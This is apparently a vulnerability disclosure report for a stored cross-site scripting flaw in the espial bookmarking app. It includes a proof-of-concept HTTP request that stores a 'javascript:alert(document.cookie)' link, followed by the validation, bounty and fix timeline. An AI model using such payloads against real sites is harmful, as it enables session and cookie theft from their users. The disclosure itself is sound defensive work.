Cross-site Scripting (XSS) - Stored in jonschoning/espial

Valid

Reported on

Sep 27th 2021


Description

Stored XSS in url link

Proof of Concept

// PoC reqest
POST /api/add HTTP/2
Host: esp.ae8.org
Cookie: _SESSION=SilFBialwul9V05BatfVPoUjOf0Klq8Ys0C/kWXvt6o2hKA8gHSKuInA6GCizZLuYIVindIkEq5wUOys/exSV06ByNuR6duw/qBMVA2BMC6evD1k/6RQLCjxm2AXjCJBjEU1jiXW/ZtTBdZyNhwPHI6SK4YClUoiIAfpXuUB+ysShu6Kx+8JCRK2igki/pHI6F/+nXgpt3fGW7Va9/SvIqFNzEtAmIpD0aNupcsEnpp9iG/gkml5J8HT3C0x8JMDRakuS+Em3a+6o9bkbptOS0nU9HVP5lGZsIygZXRB1w1wBE4dqVoXg21VwbARToY8VEbaJZV2CjiBQW8=; XSRF-TOKEN=dBcG59xtr68JUiaUpdwGp9pDUaszdEsgktplKRuf
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Xsrf-Token: dBcG59xtr68JUiaUpdwGp9pDUaszdEsgktplKRuf
Content-Type: application/json
Content-Length: 192
Origin: https://esp.ae8.org
Referer: https://esp.ae8.org/add?next=back
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"url":"javascript:alert(document.cookie)","toread":true,"title":"1234","time":null,"tags":"xss","slug":null,"selected":null,"private":true,"description":"902903","bid":null,"archiveUrl":null}

The XSS payload will trigger when user clicks the link.

Impact

This vulnerability is capable of stored XSS

We have contacted a member of the jonschoning/espial team and are waiting to hear back 2 months ago
Jon Schoning validated this vulnerability 2 months ago
M0rphling has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jon Schoning confirmed that a fix has been merged on 2d3b3c 2 months ago
Jon Schoning has been awarded the fix bounty